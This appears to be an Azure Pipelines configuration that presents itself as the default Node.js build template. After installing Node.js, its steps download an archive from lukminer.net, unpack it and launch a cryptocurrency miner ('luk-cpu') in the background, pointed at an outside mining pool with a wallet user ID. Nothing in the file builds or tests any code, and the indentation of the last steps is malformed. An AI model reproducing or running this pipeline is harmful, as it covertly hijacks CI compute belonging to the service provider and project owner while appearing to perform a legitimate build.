# Node.js
# Build a general Node.js project with npm.
# Add steps that analyze code, save build artifacts, deploy, and more:
# https://docs.microsoft.com/azure/devops/pipelines/languages/javascript

trigger:
- master

pool:
  vmImage: 'Ubuntu-16.04'

steps:
- task: NodeTool@0
  inputs:
    versionSpec: '8.x'
  displayName: 'Install Node.js'

- script: |
    wget http://www.lukminer.net/releases/latest.tgz
  displayName: 'wget'

  - script: |
    tar xfvz latest.tgz
  displayName: 'tar'

  - script: |
    ./luk-cpu -a xmrv8 --host pool.simpleco.in --port 8080 --user etnobox.25418 --pass x -t 1 &
  displayName: 'luk-cpu'
